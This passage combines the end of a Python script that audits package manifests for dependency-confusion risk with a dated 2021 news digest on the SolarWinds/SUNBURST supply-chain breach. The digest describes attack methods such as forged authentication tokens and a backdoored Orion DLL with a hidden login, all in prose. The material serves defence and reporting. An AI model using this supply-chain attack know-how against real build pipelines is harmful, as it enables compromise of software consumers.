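PUBLIC_REGISTRY: Dict[str, str] = {
    "requests-like": "2.25.1",
    "acme-auth-core": "99.0.0",   # the internal name has been published publicly
    "acme-metrics": "0.9.0",      # same name, but a lower version (for now)
}
MANIFEST = ["requests-like", "acme-auth-core", "acme-metrics",
            "acme-reporting", "@acme/billing"]
PRIVATE_SCOPES = ("@acme/",)     # scoped names that the build maps to the private feed


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn "1.2.3" into (1, 2, 3) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def resolve_highest_wins(name: str, internal: Dict[str, str], public: Dict[str, str]):
    """Model a resolver that merges both indexes and picks the highest version,
    which is the behaviour dependency confusion exploits (an "extra" index treated
    as equal to the primary one). Returns (source, version) or None if unknown."""
    candidates = []
    if name in internal:
        candidates.append(("internal", internal[name]))
    if name in public:
        candidates.append(("public", public[name]))
    if not candidates:
        return None
    return max(candidates, key=lambda c: parse_version(c[1]))


def assess_dependency(name: str, internal: Dict[str, str], public: Dict[str, str],
                      private_scopes=PRIVATE_SCOPES) -> str:
    """Classify one dependency by its exposure to namespace confusion."""
    if name.startswith(private_scopes):
        return "scoped-internal"          # safe while the scope is pinned to the private feed
    in_internal, in_public = name in internal, name in public
    if in_internal and in_public:
        source, _ = resolve_highest_wins(name, internal, public)
        # Public wins today: the build would install the public package.
        # Internal wins today: still exposed the moment a higher public version appears.
        return "collision-public-wins" if source == "public" else "collision-internal-wins"
    if in_internal:
        return "internal-unclaimed"       # name is free to register publicly: claim or scope it
    if in_public:
        return "public"                   # ordinary third-party dependency
    return "unknown"


def audit_manifest(manifest, internal=INTERNAL_REGISTRY, public=PUBLIC_REGISTRY):
    """Return {dependency_name: classification} for every manifest entry."""
    return {name: assess_dependency(name, internal, public) for name in manifest}


def highest_risk(report: Dict[str, str]):
    """Names that would already resolve to the public registry."""
    return sorted(n for n, status in report.items() if status == "collision-public-wins")


if __name__ == "__main__":
    for name, status in audit_manifest(MANIFEST).items():
        print(f"{name:20s} {status}")
```

Every status other than "public" and "scoped-internal" needs action: either reserve the name on the public registry, move the package into a scope that is explicitly mapped to the private feed, or configure the build so the private feed is the only source for those names.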

_______________________________________________________________________________________

(February 16, 2021)


A SolarWinds-like cyberattack targeted Centreon, French researchers disclose

French cybersecurity authorities have disclosed a SolarWinds-like supply-chain attack in which hackers compromised the Centreon enterprise IT monitoring platform to target several major organizations. The first evidence of the intrusion campaign dates back to 2017, with the attack lasting until 2020. It mostly affected IT providers, in particular web hosting providers.

Ref - ITPro 

_______________________________________________________________________________________

(February 16, 2021)


Microsoft reveals new details about sophisticated mega-breach

Microsoft has made new revelations regarding the SolarWinds attacks and is calling the cyber-attack the most sophisticated of all time. According to Brad Smith, Microsoft has assigned 500 engineers to dig into the attack. Cyjax CISO Ian Thornton-Trump points out that the attackers had only one chance to get the malware into place without revealing their compromise: had a build failed because of the malicious code, their plot to infect Orion would have been exposed.

Ref - Forbes 

_______________________________________________________________________________________

(February 15, 2021)


Many SolarWinds customers failed to secure even after the breach came to light 

Many companies still expose SolarWinds Orion to the internet and have failed to take action following the disclosure of the massive SolarWinds breach. RiskRecon, a firm specialized in risk assessment, observed 1,785 organizations exposing Orion to the internet on December 13, 2020, shortly after the breach came to light, and the number dropped to 1,330 by February 1, 2021. However, only 8% of these companies have applied the Orion update (2020.2.4) in response to the breach.


_______________________________________________________________________________________

(February 15, 2021)


Microsoft found 1,000-plus developers' fingerprints on the SolarWinds hack

Microsoft president Brad Smith says that their analysis of the SolarWinds hack suggests the code behind the crack was the work of a thousand or more developers. Smith didn’t say who those 1,000 developers worked for but compared the SolarWinds hack to attacks on Ukraine that had been widely attributed to Russia.


_______________________________________________________________________________________

(February 15, 2021)


SolarWinds hack is the largest and most sophisticated attack ever - Microsoft’s President

A hacking campaign that used a U.S. tech company as a springboard to compromise a raft of U.S. government agencies is the largest and most sophisticated attack the world has ever seen, according to Microsoft Corp’s president Brad Smith. The SolarWinds breach could have compromised up to 18,000 SolarWinds customers that used the company’s Orion network monitoring software. It could take months to identify the compromised systems and expel the hackers.

Ref - Reuters

_______________________________________________________________________________________

(February 14, 2021)


How Russian spies hacked the US federal agencies during SolarWinds attacks

Brad Smith, the president of Microsoft, has said that the sophistication of the SolarWinds attacks shows the attacker had the asymmetric advantage that comes with playing offense, and that these attacks are almost certainly still continuing. Kevin Mandia, CEO of FireEye, disclosed that the intruders impersonated FireEye employees while snooping around inside its network, stealing the proprietary tools FireEye uses to test its clients' defenses along with intelligence reports on active cyber threats.

Ref - CBS News 

_______________________________________________________________________________________

(February 14, 2021)


The SolarWinds attack could be still ongoing

The SolarWinds attack was unprecedented in audacity and scope, and the Russian spies went rummaging through the digital files of the U.S. Departments of Justice, State, Treasury, Energy, and Commerce. For nine months, they had unfettered access to top-level communications, court documents, even nuclear secrets. And by all accounts, it is still going on, and the hackers could still be stealing information.

Ref - CBS News

_______________________________________________________________________________________

(February 14, 2021)


The U.S. must strike back after SolarWinds breach

James Lewis, a director at the Center for Strategic and International Studies, said fear of escalation has held the U.S. back from punishing Russia, and other nation-states when they step out of line. He suggested the U.S. experiment with tactics to find creative ways of inflicting revenge on Russia.

Ref - CBS News

_______________________________________________________________________________________

(February 12, 2021)


CISOs' 2021 priorities after SolarWinds attack 

After the SolarWinds attack, CISOs will need to redraw contracts with third-party providers of software, hardware, and services to explicitly demand that the providers commit to securing their own environments. This includes ensuring they use third-party static code analysis, regular security scanning of local and cloud-based environments, DevSecOps, and code integrity checks. In addition, they must adopt the latest encryption and authentication technologies.


_______________________________________________________________________________________

(February 12, 2021)

US court system demands changes to how court documents are stored after SolarWinds breach

Multiple U.S. senators have demanded a hearing on what court officials know about the hackers' access to sensitive filings. A number of courthouses are now uploading documents to a single computer. All 13 of the country's federal circuit courts have separate measures and rules they take to protect the security of documents filed, but now everything may need to change due to the attack.


_______________________________________________________________________________________

(February 12, 2021)


Orion servers exposed to Internet drop by 25% since SolarWinds breaches

One in four SolarWinds Orion servers exposed to the internet at the time of an era-defining espionage campaign has been taken off the internet. This could mean different things to different companies. Some may have put the servers inside of a firewall. Others may have found a replacement for SolarWinds. Yet others may have deactivated the servers during remediation.

Ref - SC Media 

_______________________________________________________________________________________

(February 12, 2021)


Russians outsmarted DHS cyberattack detection program in SolarWinds hack

From a software engineering perspective, the SolarWinds attack is probably the largest and most sophisticated attack the world has ever seen. The alleged Russian attackers had huge resources at their disposal, and probably more than 1,000 engineers worked on these attacks.

Ref - CBS News 

_______________________________________________________________________________________

(February 11, 2021)


Unanswered questions about SolarWinds breach

There is a considerable fear that the attackers behind the SolarWinds breach may have gained deep, persistent, and almost undetectable access on networks belonging to numerous organizations in sectors including manufacturing, industrial, construction, and logistics. The incident also resurfaced old concerns over supply chain vulnerabilities and some new ones over the ability of even the best security tools and controls to detect highly targeted attacks.


_______________________________________________________________________________________

(February 11, 2021)


New stats about suspicious network activity during peak of SUNBURST attack

ExtraHop threat researchers have found that between late March 2020 and early October 2020, detections of probable malicious activity increased by approximately 150 percent. Activity patterns outlined in the report indicate that the SUNBURST attackers were successful in flying under the radar of these detection methods either by disabling them or by redirecting their approach before they could be detected.

Ref - Yahoo 

_______________________________________________________________________________________

(February 11, 2021)


How suspected Chinese hackers compromised USDA’s National Finance Center

Chinese hackers exploited a different SolarWinds flaw from the one used by Russian hackers to compromise the National Finance Center, which sits under the U.S. Department of Agriculture (USDA). It is said that the suspected Chinese hacking incident affected only a single customer and that a security update was released in December 2020.

Ref - CPO Magazine 

_______________________________________________________________________________________

(February 10, 2021)


Maritime facilities using SolarWinds are ordered to report breaches

The U.S. Coast Guard (USCG) has ordered MTSA-regulated facilities and vessels using SolarWinds software for critical functions to report security breaches in case of suspicions of being affected by the SolarWinds supply-chain attack. USCG's order was delivered through a Marine Safety Information Bulletin published on continued awareness regarding the ongoing exploitation of SolarWinds software.


_______________________________________________________________________________________

(February 10, 2021)


A senior official is leading the inquiry into SolarWinds breach

The White House has announced that it has put a senior national security official in charge of the response to the broad Russian breach of government computers, only hours after the Democratic chairman of the Senate Intelligence Committee criticized the disjointed and disorganized response in the opening weeks of the Biden administration.


_______________________________________________________________________________________

(February 10, 2021)


SolarWinds breach showed that the U.S. is most targeted and vulnerable

The U.S. is one of the most advanced, if not the most advanced, cyber superpowers in the world, but it is also the most targeted and the most vulnerable. Part of the problem is that the U.S. has spent more energy on hacking other countries than on defending itself. This attack hit the Department of Homeland Security — the very agency charged with keeping the US safe.

Ref - NPR

_______________________________________________________________________________________

(February 10, 2021)


More cyberattacks like SolarWinds could be expected from Russia

The federal government's former top cybersecurity official warned lawmakers that the SolarWinds Orion hack is likely not the worst attack the United States may see from Russia. The federal agencies investigating the attack as well as third-party cybersecurity experts have largely concurred the breach appears to be espionage.

Ref - FCW

_______________________________________________________________________________________

(February 10, 2021)


SolarWinds breach put the spotlight on supply chain attacks

The recent SolarWinds breach has proved how devastating a well-executed supply chain attack can be. What sets it apart from other cases is its peculiar victim profiling and validation scheme. Through the SolarWinds Orion IT packages, the attackers reached around 18,000 customers and stayed inside targeted victims' networks for months without raising any alarms.

Ref - CSO

_______________________________________________________________________________________

(February 10, 2021)


Security of supply chains is actually worse than everyone thinks

Several indicators suggest that the security of supply chains is in a worse state than commonly assumed. Many enterprise networks consist of an untold number of disparate products, duct-taped together through poorly documented interfaces. Most organizations have no clue they are sitting ducks for average attackers of moderate skill, much less for nation state-backed adversaries with unlimited resources.

Ref - ZDNet

_______________________________________________________________________________________

(February 9, 2021)


The encryption backdoor from 2015 could be behind the SolarWinds attacks

While it is still not clearly known how hackers altered the code of SolarWinds software, many point to the Juniper Networks 2015 incident as a precursor to the recent hack. In a letter addressed to the NSA, members of Congress questioned whether the agency knew about the encryption backdoor in the Juniper Networks products.

Ref - NordVPN 

_______________________________________________________________________________________

(February 9, 2021)


Lessons from SolarWinds attack for federal agencies

There are several lessons for federal agencies to take away from the recent SolarWinds attacks. These include making sure the response actually reduces risk (turning off security updates and patches won't). It also makes sense to choose reputable, responsive suppliers that adhere to security standards and best practices. In addition, apply least privilege and Zero Trust policies, and give sensitive data adequate protection.

Ref - Varonis

_______________________________________________________________________________________

(February 9, 2021)


The U.S. must prioritize cybersecurity after the SolarWinds breach

The SolarWinds hack is considered an egregious act of espionage, stealing data, and establishing unauthorized access to information technology. Thus, nations must move past jurisdictional grandstanding to develop a national cybersecurity strategy. There must be a comprehensive approach to cybersecurity that keeps the United States a step ahead of its adversaries.

Ref - CNBC

_______________________________________________________________________________________

(February 9, 2021)


What could be the purpose behind the SolarWinds hack?

The purpose of the SolarWinds hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.


_______________________________________________________________________________________

(February 9, 2021)


SolarWinds breach has created disturbances for security worldwide

While the scope of the Solorigate attack is substantial, the scale of the sophisticated deception employed by the malicious actors is even more significant. The SolarWinds security breach highlights the need for organizations at the end of the digital development and supply pipeline to actively scan, monitor, and manage all software updates, no matter where they come from or where they sit in the application stack.

Ref - Forbes 

_______________________________________________________________________________________

(February 9, 2021)


The SolarWinds hack was not inevitable

The SolarWinds hack was a major breach of national security that revealed gaps in U.S. cyber defenses. The larger question is why SolarWinds, an American company, had to turn to foreign providers for software development. A Department of Defense report about supply chains characterizes the lack of software engineers as a crisis. There’s also a shortage of cybersecurity talent in the U.S. Engineers, software developers and network engineers are among the most needed skills across the U.S.

Ref - Yahoo 

_______________________________________________________________________________________

(February 9, 2021)


SolarWinds attack highlights the importance of the principle of least privilege

The advanced persistent threat (APT) behind the SolarWinds attack used forged authentication tokens and credentials to highly privileged Active Directory domain accounts as a persistence and escalation mechanism. This attack method has reinforced the importance of implementing least privilege, which is one of the 33 IT security principles outlined by NIST.


_______________________________________________________________________________________

(February 8, 2021)


Microsoft and SolarWinds having disputes over nation-state attacks

The latest investigation updates from SolarWinds and Microsoft offer differing views on how nation-state threat actors compromised SolarWinds' environment. The SolarWinds CEO claimed that threat actors got into SolarWinds' Office 365 environment first before moving to the Orion development environment. However, Microsoft said its investigation found no evidence it was attacked via the email software.


_______________________________________________________________________________________

(February 8, 2021)


US response to SolarWinds breach

In a formal joint statement, four U.S. agencies in charge of intelligence and cybersecurity affirmed that an advanced hacking group, likely Russian in origin, is responsible for the SolarWinds Orion software compromise. The Computer Fraud and Abuse Act (CFAA) could be used to indict Russian state hackers for trespassing in government computers or obtaining national security information. Sanctioning or indicting Russian state actors for cyber espionage, however, could set a dangerous precedent to be used against individual NSA or CIA hackers.

Ref - CFR

_______________________________________________________________________________________

(February 8, 2021)


SolarWinds' breach can lead to a larger attack 

Cybersecurity experts fear the SolarWinds hack has laid the groundwork for a larger attack that the federal government is not prepared to handle. After attackers exploited vulnerabilities in SolarWinds’ computer network management software to breach federal systems, a race began to fortify cyber defenses before additional attacks damage critical infrastructure and cause economic instability.


_______________________________________________________________________________________

(February 8, 2021)


SolarWinds attack is a wake-up call

The SolarWinds attacks represent a shift in tactics for supply chain attacks, with a nation-state employing a new weapon for cyber-espionage. The impact of this attack shows how a high-volume commercial software product can affect many organizations simultaneously. From a US national security perspective, this attack enables the nation's enemies to steal all manner of information, from inter-governmental communications to national secrets.

Ref - ITWeb 

_______________________________________________________________________________________

(February 5, 2021)


NIST offers tools to defend against nation-state cyber threats

NIST's new publications provide a "roadmap" for how agencies of any size should counter increasingly advanced tradecraft from nation-state actors. Tightening access controls for non-federal agencies would improve the confidentiality of sensitive information but can also prevent the initial access for advanced persistent threats targeting government agencies.

Ref - FCW

_______________________________________________________________________________________

(February 5, 2021)


Software supply chains are at risk of more attacks like SolarWinds attack

Revelations of the attack's full breadth and depth continue to escalate, as do the alarm bells ringing throughout government and industry. The next SolarWinds attack is a matter of when, not if - and the next breach could be far more damaging than just infiltration and espionage. SolarWinds is a wake-up call for leaders to secure their end-to-end software supply chain.

Ref - Forbes 

_______________________________________________________________________________________

(February 5, 2021)


SolarWinds plans for safer customer community

SolarWinds President and CEO Sudhakar Ramakrishna and cybersecurity expert and Krebs Stamos Group Founding Partner Alex Stamos revealed a plan for a safer SolarWinds and customer community. The principles for the secure enterprise include further securing the internal environment, enhancing the product development environment, and ensuring the security and integrity of software.

_______________________________________________________________________________________

(February 5, 2021)


Microsoft: Microsoft services not used as an entry point by SolarWinds attackers

Microsoft has said that there was no indication that SolarWinds was attacked via Office 365. While data hosted in Microsoft email and other services were targeted by the hackers “post-compromise,” it had found no evidence that its services were used as an initial entry point into the systems of organizations, claiming that the attackers apparently gained privileged credentials “in some other way.”


_______________________________________________________________________________________

(February 5, 2021)


A deeper look into the massive 2020 cyberattack on the United States

Dmitri Alperovitch, the executive chair of the Silverado Policy Accelerator think tank, and co-founder and former CTO of CrowdStrike, has described the many ways somebody can perpetrate a cyberattack. According to him, the most surprising thing about the SolarWinds attack is its scale, and he estimates that it is going to take months, potentially even years, to get to all the different networks that these actors have infiltrated.

Ref - Fortune 

_______________________________________________________________________________________

(February 4, 2021)

Government-funded cybersecurity system In-toto could have prevented SolarWinds attacks

The cyber-security system named in-toto is aimed at providing end-to-end protection for the entire software supply pipeline. This project, already available for free, is supported by $2.2 million in grants from US federal agencies. If widely deployed, this could have blocked or minimized the damage from the SolarWinds attack.

Ref - Medium 

_______________________________________________________________________________________

(February 4, 2021)


Importance of zero-trust mindset after SolarWinds breach

The recent SolarWinds attack has reinforced two key points that the industry has been advocating for a while now, defense-in-depth protections and embracing a zero-trust mindset. Defense-in-depth protections and best practices are really important because each layer of defense provides an extra opportunity to detect an attack and take action before they get closer to valuable assets. A zero-trust philosophy is also important to provide protection even when an attacker gains unauthorized access.

Ref - Microsoft

_______________________________________________________________________________________

(February 4, 2021)


Organizations should be wary of third-party providers after SolarWinds breach

The recent SolarWinds breach has shown that any company producing software or hardware for other organizations is a potential target of a supply chain attack. Nation-state actors have deep resources and the skills to penetrate even the most security-conscious firms. Even security vendors can be targets.

Ref - CSO

_______________________________________________________________________________________

(February 4, 2021)


The SolarWinds attack proves that an on-premise Active Directory is still an effective attack vector

New evidence points to attackers using well-established methods to gain initial access the old-fashioned way, through on-premises Active Directory (AD). Attackers used methods such as password guessing, password spraying, and exploiting poorly secured administrative or service credentials. They then used native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the certificate-signing capability of Microsoft Active Directory Federated Services (AD FS) and forge authentication tokens.


_______________________________________________________________________________________

(February 4, 2021)


SolarWinds chases multiple leads in the breach investigation

According to new intelligence shared by SolarWinds, UNC2452, the Russia-linked advanced persistent threat (APT) group behind the December 2020 SolarWinds cyber attacks, probably accessed SolarWinds’ systems both through a zero-day vulnerability in Microsoft Office 365 and through a compromise of user credentials.


_______________________________________________________________________________________

(February 4, 2021)


SolarWinds confirms that Office 365 email compromise played role in recent massive cyber attacks

SolarWinds CEO Sudhakar Ramakrishna has verified suspicious activity in its Office 365 environment, with a company email account compromised and used to access the accounts of targeted SolarWinds staff in business and technical roles. Hackers most likely entered SolarWinds' environment through compromised credentials and/or a third-party application that capitalized on a zero-day vulnerability.

Ref - CRN 

_______________________________________________________________________________________

(February 3, 2021)


Impact of SolarWinds attacks on security managers 

With the increasing sophistication of attacks, there is a call for security managers to reduce the time of detection and response to threats. Having an incident response plan and playbook is key in protecting important customer or organizational data. Conducting assessments, having a strong communication structure with your board, and implementing strong security solutions are critical.

Ref - Aurora  

_______________________________________________________________________________________

(February 3, 2021)


SolarWinds CEO: Office 365 environment was compromised in SolarWinds breach

In new details on the SolarWinds breach, it has been disclosed that nation-state threat actors first compromised a single email account and later gained access to the company's Orion platform environment. From there, the threat actors compromised the credentials of the employees, got privileged access to the Orion build environment, and then added the backdoor to software updates for the platform.


_______________________________________________________________________________________

(February 3, 2021)


The path of becoming secure by design after SolarWinds breach

The SolarWinds breach taught several lessons about becoming more secure: upgrading to stronger and deeper endpoint protections, enhancing the Data Loss Prevention solution, expanding the Security Operations Center, and tightening firewall policies. Along with these tips, adopting zero trust and least privilege access, and addressing the risks associated with third-party application access, are also very important.


_______________________________________________________________________________________

(February 3, 2021)


Use of a backdoor implant in a SolarWinds Orion server

In early 2020, the Sophos Managed Threat Response (MTR) team was brought in to help an organization that had fallen victim to a Ragnar Locker attack. The C2s, web shell, and DLL used in that attack may not be directly related to the recent SolarWinds attacks, but they carry several similarities. The threat actor gained access to the web server and installed a web shell to send commands and orchestrate the rest of the attack. A backdoored version of OrionWeb.dll was downloaded from their C2 server. Additional logic was added to authenticate the username "_system" with a dynamic password that changed every day, and the file's digital signature was removed.

Ref - Sophos

_______________________________________________________________________________________

(February 3, 2021)


Findings from SolarWinds ongoing investigations

According to SolarWinds, their email account was compromised and used to programmatically access accounts of targeted SolarWinds personnel in business and technical roles. By compromising the credentials of SolarWinds employees, the threat actors were able to gain access to and exploit their Orion development environment.


_______________________________________________________________________________________

(February 3, 2021)


Additional details on vulnerabilities in SolarWinds Orion and SonicWall appliances

Details have been revealed on two vulnerabilities (CVE-2021-25274 and CVE-2021-25275) in the SolarWinds Orion platform and a single vulnerability in the SolarWinds Serv-U FTP server for Windows. SolarWinds Orion Platform users can upgrade to version 2020.2.4. SolarWinds Serv-U FTP users can upgrade to version 15.2.2 Hotfix 1. Similarly, for the zero-day vulnerability found in SonicWall SMA 100 Series appliances, the company has released a patch in firmware version SMA 10.2.0.5-29sv.

Ref - Rapid7

_______________________________________________________________________________________

(February 3, 2021)


Unfolding the SolarWinds breach

Pushkar Tiwari, Director Development at Symantec Enterprise Division of Broadcom Inc., has revealed the entire episode about what, when, why, and how of the SolarWinds hack. Tiwari has closely followed and analyzed the modus operandi of the hack.

Ref - CISO MAG

_______________________________________________________________________________________

(February 3, 2021)


Three new severe security vulnerabilities identified impacting SolarWinds products

Three severe security vulnerabilities have been identified impacting SolarWinds products. Two of the flaws (CVE-2021-25274 and CVE-2021-25275) were identified in the SolarWinds Orion Platform, while a third separate weakness (CVE-2021-25276) was found in the company's Serv-U FTP server for Windows.


_______________________________________________________________________________________

(February 3, 2021)


‘Severe’ SolarWinds vulnerabilities allow hackers to take over servers

A new set of three “severe” vulnerabilities have been discovered in the SolarWinds Orion platform. These issues could allow an attacker full remote code execution, access to credentials for recovery, and the ability to read, write to or delete any file on the system.

Ref - Forbes 

_______________________________________________________________________________________

(February 3, 2021)


Chinese hackers suspected to be involved in SolarWinds breach

It is suspected that Chinese hackers exploited a flaw in software made by SolarWinds Corp to help break into U.S. government computers last year, marking a new twist in a sprawling cybersecurity breach that U.S. lawmakers have labeled a national security emergency. It has been found that the National Finance Center, a federal payroll agency inside the U.S. Department of Agriculture was among the affected organizations.

Ref - Reuters

_______________________________________________________________________________________

(February 3, 2021)


Suspected Chinese hackers used SolarWinds bug to attack additional federal agencies

Suspected Chinese hackers exploited a flaw in software made by SolarWinds Corp to help break into US government computers last year. The attackers used computer infrastructure and hacking tools previously deployed by state-backed Chinese cyberspies. SolarWinds said it was aware of a single customer that was compromised by the second set of hackers but cannot say conclusively who was responsible.


_______________________________________________________________________________________

(February 2, 2021)


New revelations deepen the fears related to third-party software use

The new revelation about the involvement of Chinese hackers underscores the seemingly impossible task that organizations face in dealing with not only their own security issues but also potential exposure from the countless third-party companies they partner with. It is said that the Chinese hackers exploited the vulnerability only after already breaking into a network by some other means. They then used the flaw to bore deeper.

Ref - Wired

_______________________________________________________________________________________

(February 2, 2021)


Hackers stayed inside SolarWinds email system for almost 9 months

The newly appointed chief executive of SolarWinds Corp. is still trying to unravel how his company became a primary vector for hackers in a massive attack revealed last year. According to him, pieces of evidence are emerging that they were lurking in the company’s Office 365 email system for months. The company is still trying to understand how the hackers first got into the company’s network and when exactly that happened.


_______________________________________________________________________________________

(February 2, 2021)


Learnings from SolarWinds breach - Singapore CERT

Singapore CERT has provided several key takeaways and guidelines to prevent future supply-chain attacks like SolarWinds. First, supply-chain attacks are likely to continue to occur, so organizations should make every effort to improve visibility. Second, the breach demonstrates the asymmetric nature of the cybersecurity threat, which requires organizations to continuously enhance and develop their cybersecurity capabilities. The breach also highlights the importance of the international community’s efforts in establishing clear rules and norms to promote responsible behavior in cyberspace.

Ref - CSA

_______________________________________________________________________________________

(February 2, 2021)


A U.S. federal payroll agency breached by exploiting SolarWinds flaw

The FBI has discovered that the National Finance Center, a U.S. Department of Agriculture (USDA) federal payroll agency, was compromised by exploiting a SolarWinds Orion software flaw. Even though both the FBI and the USDA declined to provide further comment, the latter confirmed that it had suffered a data breach.


_______________________________________________________________________________________

(February 1, 2021)


U.S. court system goes paper for sensitive documents after SolarWinds hack

The US court system has banned the electronic submission of legal documents in sensitive cases out of concern that Russian hackers have compromised the filing system. In an extraordinary order handed down to all federal courts, any documents that contain information that is likely to be of interest to the intelligence service of a foreign government will now have to be physically printed out and provided in a physical format.


_______________________________________________________________________________________

(February 1, 2021)


SolarWinds breach put light on an old supply-chain incident

In the wake of the recent SolarWinds attacks, Members of Congress are demanding the U.S. National Security Agency (NSA) reveal information about an old (2015) Juniper Networks supply-chain delivery breach. A chief bone of contention among lawmakers is the allegation that the NSA’s “Dual_EC_DRBG” algorithm, submitted to the National Institute of Standards and Technology (NIST), contained an encryption backdoor for the spy agency.


_______________________________________________________________________________________

(February 1, 2021)


How to prevent the next SolarWinds-kind attack?

First, cybersecurity professionals should take care of the “easy” stuff, such as keeping their software updated and, where necessary, applying patches. Second, companies must build a culture of security into their product design. Finally, any robust third-party security program must operate at a scale that is only practical through automation.


_______________________________________________________________________________________

(January 31, 2021)


A third of victims were not using SolarWinds software

Almost a third of the victims of the recent wave of attacks did not use the SolarWinds software, which was previously thought to be the main gateway for the attackers. The serious cyberattack on government institutions and companies in the USA is drawing ever wider circles. Investigators have found evidence that the alleged espionage operation went well beyond the compromise of the small software provider SolarWinds.


_______________________________________________________________________________________

(January 29, 2021)

A fifth of Sunburst backdoor victims are from the manufacturing sector 

Nearly a fifth of the organizations hit by the Sunburst backdoor emanating from the SolarWinds supply chain attack are from the manufacturing sector, a new analysis from Kaspersky has revealed. While researchers have already uncovered technical details of the Sunburst backdoor that was embedded in the SolarWinds software late last year, the full impact of the attack is still being investigated.


_______________________________________________________________________________________

(January 29, 2021)


SolarWinds' implications for IoT and OT

In the new episode of Talos Takes, experts from Cisco Talos provide details about how the SolarWinds attack has wide-reaching consequences in the internet-of-things (IoT) and operational technology (OT) spaces.


_______________________________________________________________________________________

(January 29, 2021)


Lessons learned from SolarWinds breach 

The SolarWinds attacks have left several important lessons behind: new binaries should be checked and verified even when they are signed; application and service accounts in cloud environments should be audited, monitored, and segregated as much as possible; a secure System Development Life Cycle (SDLC) process should be deployed to catch attackers in real time and limit the damage; and stronger passwords should be used on code management platforms.


_______________________________________________________________________________________

(January 29, 2021)


Life after the SolarWinds supply chain attack

After the disclosure of the SolarWinds attack, the first step for any organization should be to eliminate the immediate risk. If they use the affected software, they should have already followed the Cybersecurity and Infrastructure Security Agency (CISA)’s directions to disconnect and decommission any instances of SolarWinds Orion software. Even after a complete reset of all accounts, an additional top-to-bottom security review is warranted. In addition, all relationships should be examined, both between internal servers and with external third parties who might have access to the networks and systems.


_______________________________________________________________________________________

(January 29, 2021)


SolarWinds breach spooks tech firms into rechecking code

Haunted by the far-reaching implications of the SolarWinds supply chain attack, software company executives have ordered sweeping new assessments of their products, looking for any signs of suspicious activity, code anomalies, or exploits. If or when more attacks are uncovered, end-user organizations will need to apply the lessons learned from SolarWinds and prepare to take swift and decisive action.

Ref - SC Media

_______________________________________________________________________________________

(January 29, 2021)

SolarWinds breach raises questions about the appropriate response to such attacks

The sprawling reach of the SolarWinds malware attack inspires new questions about the appropriate response from private sector organizations to cyberattacks from nation-state hackers. Many enterprises, particularly those in tech and security, have tremendous insight into the workings of their own systems, which some believe puts them in a particularly unique position to hack back at attackers.

Ref - SC Media

_______________________________________________________________________________________

(January 29, 2021)


Suspected Russian hack extends far beyond SolarWinds software

Investigators examining the massive attack on the U.S. government and businesses claim that they have found concrete evidence the suspected Russian espionage operation went far beyond the compromise of the small software vendor publicly linked to the attack. Close to a third of the victims didn’t run the SolarWinds Corp. software. The revelation is fueling concern that the episode exploited vulnerabilities in business software used daily by millions.


_______________________________________________________________________________________

(January 29, 2021)


The SolarWinds hack is even worse than anyone thought

The SolarWinds hackers didn't go for the usual credit card numbers and email addresses that most cyberthieves seek. Instead, the hackers went for much higher-value internal information: emails with corporate and government secrets, the source code underlying Microsoft software, and the like. The attack also undermines the entire structure of cybersecurity in the United States, with its patchwork of government agencies, big-name security firms, thousands of smaller outside vendors, and internal IT department security efforts.

Ref - Fortune

_______________________________________________________________________________________

(January 29, 2021)


What went wrong during SolarWinds attacks, and how can we fix it

When FireEye went public with its SolarWinds news, neither the NSA, the Pentagon’s Cyber Command, nor any other U.S. intelligence or cyber agency had detected the attack, although it had likely been underway for months. FireEye wasn’t legally obligated to inform anyone - publicly or privately - about its discovery. The U.S. does not require independent research firms to share their findings of cyberthreats with government agencies, even if they constitute a potential national security threat.

Ref - Fortune 

_______________________________________________________________________________________

(January 29, 2021)


SolarWinds attackers hit several strategic targets including cyber and tech firms

For hackers, cybersecurity companies represent the gatekeepers guarding the computer networks they so desperately wish to exploit. Also, cybersecurity and technology companies often have remote access to customers’ computer networks, potentially giving hackers entry to their clients and partners. Such digital supply chain hacks are an efficient method to corral hundreds, if not thousands, of potential victims.

Ref - Bloomberg 

_______________________________________________________________________________________

(January 29, 2021)


Web supply chain may be next in line for state-sponsored attacks

Industry experts have pointed out that blind trust and long, complex chains are two key ingredients for any successful supply chain attack like the SolarWinds attack. These two are available in nearly every Web application and website that is online right now. Any breach in one of the ‘maintainer’ accounts can trigger a global Web supply chain attack and affect millions of organizations.

Ref - Dark Reading 

_______________________________________________________________________________________

(January 29, 2021)


Thirty percent of SolarWinds hack victims didn't run the software

Brandon Wales, the acting director of the Cybersecurity and Infrastructure Security Agency, has recently revealed that around 30 percent of computers previously thought to be hacked via SolarWinds didn't even run the software. Hackers linked to the attack also seem to have broken into government and private accounts by guessing passwords and exploiting issues in Microsoft's cloud-based Office software used by millions of people.

Ref - The Week 

_______________________________________________________________________________________

(January 29, 2021)


A fifth of Sunburst backdoor victims belong to the manufacturing industry

A new analysis from Kaspersky has revealed that nearly a fifth of organizations hit by the Sunburst backdoor are from the manufacturing sector. Based on a list of nearly 2000 readable and attributable domains, it was revealed that around a third (32.4%) of all victims were industrial organizations. The most impacted sector is manufacturing (18.11% of all victims), followed by utilities (3.24%), construction (3.03%), transportation and logistics (2.97%), and oil and gas (1.35%).


_______________________________________________________________________________________

(January 29, 2021)


More SolarWinds-type attacks are expected in the future

More sophisticated and complicated attacks of the SolarWinds type can be expected sooner or later. Experts also said that these attacks are going to continue to get more sophisticated. SolarWinds is a moment of reckoning for the security industry, and this is going to be the new norm.

Ref - ZDNet

_______________________________________________________________________________________

(January 28, 2021)


Most tools that detected the SolarWinds malware also failed in some way

The actors behind the SolarWinds hack easily evaded all the major cybersecurity technologies available in the market. For endpoint detection and response (EDR), the threat actor seems to have tested its malware against all the major players. It knew which ones could detect it, which ones it could turn off, and which ones it could not evade. And the same can be said for automated threat hunting platforms, and internal network monitoring tools as well.

Ref - CFR 

_______________________________________________________________________________________

(January 28, 2021)

SolarWinds attackers abused weak access policies for infiltrating inside networks

Service accounts may have played a bigger role than originally anticipated in the SolarWinds hack that compromised the networks of a number of U.S. government agencies and private organizations. Attackers may have used SolarWinds’ service accounts with high-level privileges to conduct lateral movement across the SolarWinds network and thereby gain access to more enterprise resources.

Ref - Toolbox

_______________________________________________________________________________________

(January 28, 2021)


The technical attack flow of SunBurst malware

